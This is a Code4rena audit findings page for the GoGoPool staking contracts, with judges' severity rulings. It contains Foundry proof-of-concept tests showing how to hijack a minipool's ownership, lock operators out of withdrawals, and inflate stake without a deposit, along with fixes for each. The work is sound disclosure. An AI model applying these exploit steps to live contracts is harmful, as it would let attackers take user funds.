Platform: Code4rena
Start Date: 15/12/2022
Pot Size: $128,000 USDC
Total HM: 28
Participants: 111
Period: 19 days
Judge: GalloDaSballo
Total Solo HM: 1
Id: 194
League: ETH
Rank: 57/111
Findings: 4
Award: $123.59
Selected for report: 0
Solo Findings: 0
Selected for report: 0xdeadbeef0x
Also found by: 0Kage, 0xc0ffEE, 0xmint, AkshaySrivastav, Allarious, Ch_301, Franfran, HollaDieWaldfee, IllIllI, Jeiwan, Lirios, Manboy, adriro, ak1, bin2chen, caventa, chaduke, clems4ever, cozzetti, datapunk, imare, immeas, kaliberpoziomka8552, ladboy233, pauliax, peritoflores, rvierdiiev, sces60107, sk8erboy, stealthyz, unforgiven, wagmi, wallstreetvilkas, yixxas
9.9345 USDC - $9.93
https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L259 https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L163 https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L289
A malicious staker can block withdrawals for an honest node operator by creating a new pool with the same nodeID as that operator's existing pool. The critical mistake here is that when a pool is in a valid transition state, the `createMinipool` function allows any staker to overwrite the owner of an existing pool in Line 259 of MinipoolManager.sol.
Once a new owner is set on an existing nodeID, the original minipool operator loses all access to his AVAX: he can no longer withdraw AVAX from the minipool (demonstrated below in the test case construction). I've classified it as HIGH risk because it causes loss of funds to node operators.
The key parts of the logic exploited here are:

- `Withdrawable` is a valid preceding state to `Prelaunch`
- `createMinipool` does not check if `msg.sender == owner` when a previous `nodeID` is being used

Here is the code for the exploit. Note that at the end of the exploit, the honest node operator gets a denial of service when calling `withdrawMinipoolFunds`:
```solidity
function testExploitMinipoolCreation() public {
	// step 0 - assume liquid staker deposits enough AVAX into the staking contract
	address liquidStaker = getActorWithTokens("liquidStaker1", 10000 ether, 0);
	vm.startPrank(liquidStaker);
	uint256 shares = ggAVAX.depositAVAX{value: 10000 ether}();
	assertEq(shares, 10000 ether);
	vm.stopPrank();

	// step 1 - node operator stakes 1000 GGP
	vm.startPrank(nodeOp);
	ggp.approve(address(staking), 1000 ether);
	staking.stakeGGP(1000 ether);
	assertEq(staking.getGGPStake(nodeOp), 1000 ether);

	// step 2 - node operator creates minipool of 4000 AVAX
	MinipoolManager.Minipool memory mp1 = createMinipool(4000 ether, 4000 ether, 2 weeks);
	int256 minipoolIndx = minipoolMgr.getIndexOf(mp1.nodeID);
	assertEq(minipoolIndx, 0);
	assertEq(mp1.avaxLiquidStakerAmt, 4000 ether);
	assertEq(mp1.avaxNodeOpAmt, 4000 ether);
	vm.stopPrank();

	// step 3 - rialto claims and initiates staking & records staking start
	vm.startPrank(address(rialto));
	minipoolMgr.claimAndInitiateStaking(mp1.nodeID);
	bytes32 txID = keccak256("txid");
	minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp);

	// step 4 - skip 2 weeks to complete duration of pool
	skip(2 weeks);

	// step 5 - rialto records staking end
	// for simplicity, I assume rewards = 0 (slash)
	minipoolMgr.recordStakingEnd{value: 8000 ether}(mp1.nodeID, block.timestamp, 0);

	// At this stage, pool is in the `Withdrawable` state as seen by test below
	// Original pool owner can withdraw his 4000 ether by calling `withdrawMinipoolFunds`
	MinipoolManager.Minipool memory mp1Updated = minipoolMgr.getMinipool(minipoolIndx);
	assertEq(mp1Updated.status, uint256(MinipoolStatus.Withdrawable));
	assertEq(mp1Updated.avaxNodeOpAmt, 4000 ether);
	assertEq(mp1Updated.owner, nodeOp);
	vm.stopPrank();

	// step 6 - EXPLOIT
	// Assume an exploiter knows nodeID of current node operator
	// Stake GGP and create a minipool with same nodeID as the existing node operator
	// only this time, msg.sender = exploiter
	vm.startPrank(nodeOpExploiter);
	ggp.approve(address(staking), 200 ether);
	staking.stakeGGP(200 ether);
	assertEq(staking.getGGPStake(nodeOpExploiter), 200 ether);
	minipoolMgr.createMinipool{value: 1000 ether}(mp1.nodeID, 2 weeks, 0.02 ether, 1000 ether);
	MinipoolManager.Minipool memory mp1Exploited = minipoolMgr.getMinipool(minipoolMgr.getIndexOf(mp1.nodeID));

	// THIS POOL IS NOW EXPLOITED
	// Node ID of this pool is same as nodeID of old pool
	assertEq(mp1Exploited.nodeID, mp1.nodeID);
	// Pool owner is successfully changed to exploiter
	assertEq(mp1Exploited.owner, nodeOpExploiter);
	// Pool was earlier in Withdrawable state -> moved back into Prelaunch state
	assertEq(mp1Exploited.status, uint256(MinipoolStatus.Prelaunch));
	// avaxNodeOpAmt is overwritten - earlier 4000 ether accounting entry is gone
	assertEq(mp1Exploited.avaxNodeOpAmt, 1000 ether);
	vm.stopPrank();

	// STEP 7: honest nodeOp can no longer withdraw his own AVAX
	// function reverts as he no longer owns the minipool with this nodeID
	vm.startPrank(nodeOp);
	vm.expectRevert(MinipoolManager.OnlyOwner.selector);
	minipoolMgr.withdrawMinipoolFunds(mp1.nodeID);
	vm.stopPrank();
}
```
When creating a new pool with an existing nodeID, the code doesn't check that `msg.sender` is the current owner of that nodeID. A fairly simple fix is to add an `onlyOwner` check in the code block starting at Line 242 (see below):
```solidity
if (minipoolIndex != -1) {
	onlyOwner(minipoolIndex);
	requireValidStateTransition(minipoolIndex, MinipoolStatus.Prelaunch);
	resetMinipoolData(minipoolIndex);
	// Also reset initialStartTime as we are starting a whole new validation
	setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".initialStartTime")), 0);
}
```
#0 - c4-judge
2023-01-10T17:00:54Z
GalloDaSballo marked the issue as duplicate of #617
#1 - c4-judge
2023-01-10T17:01:29Z
GalloDaSballo marked the issue as duplicate of #213
#2 - c4-judge
2023-02-03T12:33:01Z
GalloDaSballo changed the severity to 2 (Med Risk)
#3 - c4-judge
2023-02-03T19:26:10Z
GalloDaSballo changed the severity to 3 (High Risk)
#4 - c4-judge
2023-02-08T08:26:45Z
GalloDaSballo changed the severity to 2 (Med Risk)
#5 - c4-judge
2023-02-08T08:50:11Z
GalloDaSballo changed the severity to 3 (High Risk)
#6 - c4-judge
2023-02-08T20:28:30Z
GalloDaSballo marked the issue as satisfactory
#7 - c4-judge
2023-02-09T08:53:06Z
GalloDaSballo changed the severity to QA (Quality Assurance)
#8 - Simon-Busch
2023-02-09T12:54:09Z
Changed severity back from QA to H as requested by @GalloDaSballo
Selected for report: 0xbepresent
Also found by: 0Kage, Atarpara, Ch_301, Manboy, cozzetti, datapunk, immeas, kaliberpoziomka8552, peritoflores, rvierdiiev, sces60107, unforgiven, wagmi, yixxas
57.1995 USDC - $57.20
https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L530 https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L290
A multisig can move a pool from `error` state to `finished` state after human review of the error by calling the `finishFailedMinipoolByMultisig` function in Line 530 of MinipoolManager.sol. This function can be accidentally or maliciously misused by a multisig to permanently lock a node operator out of withdrawing funds from a minipool.
The key vulnerability is that the `requireValidStateTransition` function in Line 290 of MinipoolManager.sol recognises both `withdrawable` and `error` states as valid predecessor states to the `finished` state.
So if the `nodeID` of a pool in `withdrawable` state gets accidentally passed to the `finishFailedMinipoolByMultisig` function, its status gets updated to `finished`. The side effect is that the node operator can never withdraw funds anymore using `withdrawMinipoolFunds`. What makes it risky is that this state change is irreversible: even the multisig/guardian cannot reverse the status of a pool from `finished` back to `withdrawable`.
Since a multisig can handle multiple minipools as the platform scales, the possibility of a human error leading to an irreversible loss of funds cannot be ruled out. Considering that the issue leads to a direct loss of funds for the node operator, I've classified it as HIGH risk.
I've replicated the scenario in the test case below. The scenario setup is as follows:

- A pool completes its full duration and is in `withdrawable` state
- Multisig accidentally passes the `nodeID` of this pool in place of another pool that is in `error` state
- The pool's status gets updated to `finished`, since `withdrawable` is a valid predecessor state

```solidity
function testFailedPoolTokenLockup() public {
	// step 0 - add enough liquid staker funds to create a pool
	address liquidStaker = getActorWithTokens("liquidStaker1", 10000 ether, 0);
	vm.startPrank(liquidStaker);
	uint256 shares = ggAVAX.depositAVAX{value: 10000 ether}();
	assertEq(shares, 10000 ether);
	vm.stopPrank();

	// step 1 - node operator stakes 1000 GGP
	vm.startPrank(nodeOp);
	ggp.approve(address(staking), 1000 ether);
	staking.stakeGGP(1000 ether);
	assertEq(staking.getGGPStake(nodeOp), 1000 ether);

	// step 2 - node operator creates minipool of 4000 AVAX
	MinipoolManager.Minipool memory mp1 = createMinipool(4000 ether, 4000 ether, 2 weeks);
	int256 minipoolIndx = minipoolMgr.getIndexOf(mp1.nodeID);
	assertEq(minipoolIndx, 0);
	assertEq(mp1.avaxLiquidStakerAmt, 4000 ether);
	assertEq(mp1.avaxNodeOpAmt, 4000 ether);
	vm.stopPrank();

	// step 3 - rialto claims and initiates staking & records staking start
	vm.startPrank(address(rialto));
	minipoolMgr.claimAndInitiateStaking(mp1.nodeID);
	bytes32 txID = keccak256("txid");
	minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp);

	// step 4 - skip 2 weeks to complete duration of pool
	skip(2 weeks);

	// step 5 - rialto records staking end
	// for simplicity, I assume rewards = 0 (slash)
	minipoolMgr.recordStakingEnd{value: 8000 ether}(mp1.nodeID, block.timestamp, 0);

	// At this stage, pool is in the `Withdrawable` state as seen by test below
	// NodeOp can withdraw his 4000 ether by calling `withdrawMinipoolFunds`
	MinipoolManager.Minipool memory mp1Updated = minipoolMgr.getMinipool(minipoolIndx);
	assertEq(mp1Updated.status, uint256(MinipoolStatus.Withdrawable));
	assertEq(mp1Updated.avaxNodeOpAmt, 4000 ether);

	// step 6 - multisig accidentally (or maliciously) updates this pool to finished
	// since 1 multisig can manage multiple pools, possibility of human error exists in picking a wrong nodeID
	// in this case, I've assumed multisig sends nodeID of pool in `withdrawable` state
	// since pools with status `error` and `withdrawable` are valid preceding states to `finished` status,
	// the function below gets executed
	minipoolMgr.finishFailedMinipoolByMultisig(mp1.nodeID);
	MinipoolManager.Minipool memory mp1AfterFail = minipoolMgr.getMinipool(minipoolIndx);
	assertEq(mp1AfterFail.status, uint256(MinipoolStatus.Finished));
	vm.stopPrank();

	// step 7 - NodeOp is locked out of withdrawal of his AVAX
	// since the status is already in finished state, code returns InvalidStateTransition error
	vm.startPrank(nodeOp);
	vm.expectRevert(MinipoolManager.InvalidStateTransition.selector);
	minipoolMgr.withdrawMinipoolFunds(mp1.nodeID);
	vm.stopPrank();
}
```
Since both `withdrawable` & `error` states are valid predecessors for the `finished` state, when calling the `finishFailedMinipoolByMultisig` function the code should strictly check that the current state is `Error` and revert if the state is `Withdrawable`.
Recommend following change:
```solidity
function finishFailedMinipoolByMultisig(address nodeID) external {
	int256 minipoolIndex = onlyValidMultisig(nodeID);
	requireValidStateTransition(minipoolIndex, MinipoolStatus.Finished);
	// FIX: explicitly reject pools that are still in Withdrawable state
	if (getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status"))) == uint256(MinipoolStatus.Withdrawable)) {
		revert InvalidStateTransition();
	}
	setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Finished));
	emit MinipoolStatusChanged(nodeID, MinipoolStatus.Finished);
}
```
#0 - emersoncloud
2023-01-15T12:45:31Z
For the purposes of this audit we're assuming that the Rialto Multisig will always do the correct operation and won't finish a minipool before it's withdrawn.
I do agree that finishing a minipool before a node operator has withdrawn would result in lost funds for that node operator and is something we intend on fixing. I think medium is more appropriate for this report.
#1 - 0xju1ie
2023-01-17T10:09:44Z
#2 - c4-judge
2023-01-26T18:56:21Z
GalloDaSballo marked the issue as duplicate of #723
#3 - c4-judge
2023-02-03T10:47:49Z
GalloDaSballo changed the severity to 2 (Med Risk)
#4 - c4-judge
2023-02-08T20:13:44Z
GalloDaSballo marked the issue as satisfactory
Selected for report: imare
Also found by: 0Kage, 0xbepresent, AkshaySrivastav, Faith, HollaDieWaldfee, Jeiwan, Saintcode_, betweenETHlines, btk, dic0de, enckrish, gz627, imare, jadezti, kaliberpoziomka8552, nogo, simon135, sk8erboy
34.7487 USDC - $34.75
I presume that the ability to disable a multisig (Line 68 of MultisigManager) is a security feature to prevent compromised or inactive multisigs from acting.
However, a disabled multisig can currently still perform mission-critical operations such as initiating minipools, canceling minipools, allocating rewards, etc. This is a significant security risk, both to the node operator and to the liquid staker. Since exploiting this can only be an inside job, I'm classifying it as MEDIUM risk (medium only because of the mission criticality of the operations controlled by a pool multisig).
Consider this scenario: the Guardian appoints Bob as a multisig, and Bob is tasked with maintaining 5 minipools. Bob eventually leaves the core team and his account becomes inactive & hence disabled. Bob's multisig, although disabled, can still record start/end of staking and recreate minipools for the 5 minipools he controls. There is currently no provision to transfer individual pools from a disabled multisig to a currently active one.
If Bob turns malicious, all minipools assigned to Bob - and the associated liquid-staked AVAX, node operator staked AVAX & GGP rewards - are at risk.
The dev team has selectively implemented access controls - while a disabled multisig cannot set the GGP-AVAX price or distribute GGP rewards, it can still continue to manage minipools. This selective approach to multisig access is inconsistent and risky. At the very minimum, I recommend defining a function with `onlyGuardian` access in `MinipoolManager` that gets called every time a multisig is disabled. This function should loop over all pools & replace the disabled multisig with a currently active one. Since the number of minipools is easily known via `getMinipoolCount`, and `getMinipools` gives us a list of all pools, such a function should be trivial to implement.
On a risk/reward spectrum, investing effort in building a function that completely removes access of disabled multisigs makes absolute sense.
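As a rough illustration of this recommendation, here is a minimal sketch of such a reassignment function. The storage keys and helper names (`minipool.count`, the `.multisigAddr` key, `requireRegisteredMultisig`) are assumptions for illustration and may not match the actual GoGoPool storage layout:

```solidity
// Hypothetical sketch - storage keys and helpers are illustrative,
// not the actual GoGoPool implementation.
function reassignMinipoolsFromDisabledMultisig(
	address disabledMultisig,
	address replacementMultisig
) external onlyGuardian {
	// replacement must itself be a registered (and ideally enabled) multisig
	MultisigManager multisigMgr = MultisigManager(getContractAddress("MultisigManager"));
	multisigMgr.requireRegisteredMultisig(replacementMultisig); // assumed helper

	uint256 count = getUint(keccak256("minipool.count"));
	for (uint256 i = 0; i < count; i++) {
		bytes32 key = keccak256(abi.encodePacked("minipool.item", i, ".multisigAddr"));
		// move every pool managed by the disabled multisig to the replacement
		if (getAddress(key) == disabledMultisig) {
			setAddress(key, replacementMultisig);
		}
	}
}
```

Since the number of multisigs and minipools is bounded, the loop cost stays manageable; if pool counts grow large, the same logic could be run in batches.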
#0 - c4-judge
2023-01-08T12:54:50Z
GalloDaSballo marked the issue as duplicate of #618
#1 - c4-judge
2023-02-01T19:57:26Z
GalloDaSballo marked the issue as duplicate of #702
#2 - GalloDaSballo
2023-02-02T11:57:12Z
See #618
#3 - c4-judge
2023-02-02T11:57:16Z
GalloDaSballo marked the issue as partial-50
Selected for report: imare
Also found by: 0Kage, 0xbepresent, AkshaySrivastav, Faith, HollaDieWaldfee, Jeiwan, Saintcode_, betweenETHlines, btk, dic0de, enckrish, gz627, imare, jadezti, kaliberpoziomka8552, nogo, simon135, sk8erboy
34.7487 USDC - $34.75
https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L236 https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MultisigManager.sol#L80 https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/RewardsPool.sol#L188
When a node operator creates a new pool using `createMinipool`, a multisig is allotted by calling the `requireNextActiveMultisig` function in Line 236 of MinipoolManager. This function, defined in Line 80 of MultisigManager.sol, always returns the first active multisig in the list of multisigs. As a result, there is a chance that all available pools are allotted to a single multisig.
Since each multisig has the authority to start/end staking for a pool, review errors, finalize pools, etc., the possibility of human error increases when such activities are concentrated in one account. Also, when distributing rewards in Line 188 of RewardsPool.sol, it is interesting to note that the protocol distributes rewards equally among all active multisigs. A similar distribution is missing when it comes to the allotment of minipools. This matters all the more because the protocol does not currently have a way to transfer control of a pool from multisig A to multisig B: the multisig is set once during pool creation and never changes until the pool retires.
Multisigs perform irreversible actions on minipools that can potentially lock out node operators' funds (I've already submitted 2 high-risk findings related to human errors or malicious attempts by multisigs that can lead to loss of operator funds). `requireNextActiveMultisig` in its current form concentrates a lot of power in one multisig, which could be more effectively decentralized.
I've marked this as MEDIUM risk because it poses no immediate threat but can become a long-term risk as the platform scales.
Consider the following scenario:

- `requireNextActiveMultisig` always chooses Bob as the multisig responsible for every pool created
- Bob has to review errors while staking on P-chain. Bob also needs to start and stop pools and cancel pools where appropriate

There are multiple ways to mitigate this concentration risk - one recommendation is as follows:

- Track the number of pools allotted to each multisig, e.g. under `keccak256(abi.encodePacked("multisig.item", index, ".poolCount"))`
- In `requireNextActiveMultisig`, loop through all multisigs (since they are limited, it won't be gas heavy) to find an active multisig with the lowest poolCount

This way, the allotment workload will be evenly distributed across active multisigs.
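A minimal sketch of this selection logic might look as follows. The storage keys (`multisig.count`, `.address`, `.enabled`, `.poolCount`) and the custom error are assumptions for illustration and may not match the actual MultisigManager layout:

```solidity
// Hypothetical sketch - picks the enabled multisig currently managing
// the fewest pools, instead of always returning the first active one.
function requireNextActiveMultisig() internal view returns (address) {
	uint256 total = getUint(keccak256("multisig.count"));
	address best;
	uint256 bestCount = type(uint256).max;
	for (uint256 i = 0; i < total; i++) {
		address addr = getAddress(keccak256(abi.encodePacked("multisig.item", i, ".address")));
		bool enabled = getBool(keccak256(abi.encodePacked("multisig.item", i, ".enabled")));
		uint256 poolCount = getUint(keccak256(abi.encodePacked("multisig.item", i, ".poolCount")));
		// keep the least-loaded enabled multisig seen so far
		if (enabled && poolCount < bestCount) {
			best = addr;
			bestCount = poolCount;
		}
	}
	if (best == address(0)) {
		revert NoEnabledMultisigFound(); // assumed custom error
	}
	return best;
}
```

The caller (e.g. `createMinipool`) would then increment the chosen multisig's `.poolCount` on allotment and decrement it when the pool retires, keeping the counter in sync.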
#0 - 0xju1ie
2023-01-19T11:40:48Z
#1 - c4-judge
2023-01-31T19:21:58Z
GalloDaSballo marked the issue as duplicate of #702
#2 - GalloDaSballo
2023-02-02T11:51:06Z
Ignoring the reward / Admin Privilege aspect, only focusing on `requireNextActiveMultisig` not functioning
#3 - c4-judge
2023-02-08T19:58:17Z
GalloDaSballo marked the issue as satisfactory
Selected for report: hansfriese
Also found by: 0Kage, 0xdeadbeef0x, Allarious, Aymen0909, Ch_301, Franfran, HollaDieWaldfee, Jeiwan, Nyx, RaymondFam, SmartSek, adriro, betweenETHlines, bin2chen, cccz, datapunk, immeas, kaliberpoziomka8552, peritoflores, wagmi
21.713 USDC - $21.71
https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L451 https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L165
Node operators can restake their rewards into a pool using the `recreateMinipool` function in Line 444 of MinipoolManager.sol. This feature can be exploited if a multisig either accidentally or maliciously passes in the `nodeID` of a retired pool (one that has completed its duration, is in `finished` state & whose node operator has withdrawn all funds).
By doing this, the retired pool is pushed back into the `Prelaunch` phase and `avaxStaked` becomes non-zero even though the node operator has not deposited any funds into the pool. This accounting entry (which is a liability for the protocol) can thus be manipulated without actual deposits backing the liability.
This vulnerability happens because:

a. Minipool storage does not delete the node operator's rewards from the last cycle even when the pool is retired. This amount then gets assigned to `avaxStaked` for the recreated pool - a malicious node operator can simply wait for the cancellation moratorium period to pass and then withdraw this `avaxStaked` for free.

b. The `Finished` state is a valid predecessor state for the `Prelaunch` state as per the valid state-transition logic.

Since this exploit causes a direct loss of funds to the protocol, I've marked the issue as HIGH risk. Below is a test case to demonstrate this exploit.
Here is an exploit scenario:

- A pool completes its full cycle, the node operator withdraws all funds, and the pool ends in `Finished` state
- Multisig accidentally (or maliciously) passes the `nodeID` of this finished pool to `recreateMinipool`. `Finished` is a valid predecessor state to `Prelaunch` & hence this function gets executed
- The recreated pool picks up the `NodeOpRewards` of the previous pool & the `increaseAVAXStake` function on `staking` increases the AVAX stake. Note that this is only an accounting entry - no actual deposit was made by the node operator

```solidity
function testRecreatePoolWithZeroDeposit() public {
	// STEP 0 - liquid staker stakes enough AVAX for pool creation
	address liquidStaker = getActorWithTokens("liquidStaker1", 10000 ether, 0);
	vm.startPrank(liquidStaker);
	uint256 shares = ggAVAX.depositAVAX{value: 10000 ether}();
	assertEq(shares, 10000 ether);
	vm.stopPrank();

	// STEP 1 - node operator stakes 1000 GGP
	vm.startPrank(nodeOp);
	ggp.approve(address(staking), 1000 ether);
	staking.stakeGGP(1000 ether);
	assertEq(staking.getGGPStake(nodeOp), 1000 ether);

	// STEP 2 - node operator creates minipool of 1000 AVAX
	MinipoolManager.Minipool memory mp1 = createMinipool(1000 ether, 1000 ether, 2 weeks);
	int256 minipoolIndx = minipoolMgr.getIndexOf(mp1.nodeID);
	assertEq(minipoolIndx, 0);
	assertEq(mp1.avaxLiquidStakerAmt, 1000 ether);
	assertEq(mp1.avaxNodeOpAmt, 1000 ether);
	vm.stopPrank();

	// STEP 3 - rialto claims and initiates staking & records staking start
	vm.startPrank(address(rialto));
	minipoolMgr.claimAndInitiateStaking(mp1.nodeID);
	bytes32 txID = keccak256("txid");
	minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp);

	// STEP 4 - skip 2 weeks to complete duration of pool
	skip(2 weeks);

	// STEP 5 - calculate rewards and deal rialto rewards
	// in this case, I'm hardcoding 50 ether as rewards
	uint256 rewards = 50 ether;
	deal(address(rialto), address(rialto).balance + rewards);

	// STEP 6 - rialto records staking end
	// pay out the 50 ether rewards at this stage
	minipoolMgr.recordStakingEnd{value: 2000 ether + 50 ether}(mp1.nodeID, block.timestamp, 50 ether);
	vm.stopPrank();

	// STEP 7 - nodeOp goes and withdraws all funds from pool
	vm.startPrank(nodeOp);
	minipoolMgr.withdrawMinipoolFunds(mp1.nodeID);
	// at this point, nodeOp has withdrawn all AVAX from the pool
	// status of pool is `Finished`
	// checking balance of avaxStaked in pool
	int256 stakerIndex = staking.getIndexOf(nodeOp);
	assertGt(stakerIndex, -1);
	assertEq(store.getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndx, ".status"))), uint256(MinipoolStatus.Finished));
	assertEq(store.getUint(keccak256(abi.encodePacked("staker.item", stakerIndex, ".avaxStaked"))), 0);
	assertEq(store.getUint(keccak256(abi.encodePacked("staker.item", stakerIndex, ".avaxAssigned"))), 0);
	// note that the reward amount at this stage is 28.75 ether
	assertEq(store.getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndx, ".avaxNodeOpRewardAmt"))), 28.75 ether); // 50/2 + 0.15*25 = 28.75 ether
	vm.stopPrank();

	// STEP 8 - multisig accidentally (or maliciously) brings a dead minipool back alive
	// by passing it into the recreate minipool function
	vm.startPrank(address(rialto));
	minipoolMgr.recreateMinipool(mp1.nodeID);
	MinipoolManager.Minipool memory recreatedPool = minipoolMgr.getMinipoolByNodeID(mp1.nodeID);
	// avaxNodeOpAmt and avaxLiquidStakerAmt were 1000 ether
	// status of finished pool is set back to Prelaunch
	// EXPLOIT: notice also that staking entries for staker have reappeared
	// WITHOUT ADDING ANY FUNDS
	assertEq(recreatedPool.status, uint256(MinipoolStatus.Prelaunch));
	assertEq(recreatedPool.avaxNodeOpAmt, 1028.75 ether);
	assertEq(store.getUint(keccak256(abi.encodePacked("staker.item", stakerIndex, ".avaxStaked"))), 28.75 ether);
	// Node operator can wait till cancellation moratorium
	// and withdraw these funds from pool - at zero cost
	vm.stopPrank();
}
```
`recreateMinipool` assumes that the pool is in `Withdrawable` state, but this implicit assumption can be exploited as shown above.
When the node operator calls `withdrawMinipoolFunds` to withdraw all deposited AVAX, all pool storage parameters specific to rewards should be reset to zero. Fortunately, a function exists to do exactly this - the recommendation is simply to call `resetMinipoolData(minipoolIndex)` inside `withdrawMinipoolFunds` once the pool has been emptied by the node operator. At that point the pool is dead & there is no point in retaining data pertaining to the past pool.
```solidity
function withdrawMinipoolFunds(address nodeID) external nonReentrant {
	int256 minipoolIndex = requireValidMinipool(nodeID);
	address owner = onlyOwner(minipoolIndex);
	requireValidStateTransition(minipoolIndex, MinipoolStatus.Finished);
	setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Finished));
	uint256 avaxNodeOpAmt = getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpAmt")));
	uint256 avaxNodeOpRewardAmt = getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpRewardAmt")));
	uint256 totalAvaxAmt = avaxNodeOpAmt + avaxNodeOpRewardAmt;

	Staking staking = Staking(getContractAddress("Staking"));
	staking.decreaseAVAXStake(owner, avaxNodeOpAmt);

	resetMinipoolData(minipoolIndex); // FIX - add this here

	Vault vault = Vault(getContractAddress("Vault"));
	vault.withdrawAVAX(totalAvaxAmt);
	owner.safeTransferETH(totalAvaxAmt);
}
```
#0 - emersoncloud
2023-01-15T12:40:49Z
Thanks for the report! However this exploit depends on the Rialto Multisig acting incorrectly, and for the purposes of this audit we are assuming that Rialto will always do the correct operation.
There are several privileged actors in the protocol (Rialto TSS Multisig, and Guardian Multisig) and contract functions that are only callable by these privileged actors. If there is an exploit which can only be executed by these privileged actors we do not consider that to be in scope for this audit.
We do intend to make the state transitions more strict, and have `recreateMinipool` explicitly check which state the minipool is currently in.
#1 - c4-judge
2023-02-03T12:42:48Z
GalloDaSballo marked the issue as duplicate of #569
#2 - GalloDaSballo
2023-02-03T12:42:52Z
Issue with FSM
#3 - c4-judge
2023-02-03T12:42:59Z
GalloDaSballo changed the severity to 2 (Med Risk)
#4 - c4-judge
2023-02-08T20:15:59Z
GalloDaSballo marked the issue as satisfactory
#5 - c4-judge
2023-02-09T08:45:54Z
GalloDaSballo changed the severity to QA (Quality Assurance)
#6 - Simon-Busch
2023-02-09T12:37:09Z
Changed the severity back to M as requested by @GalloDaSballo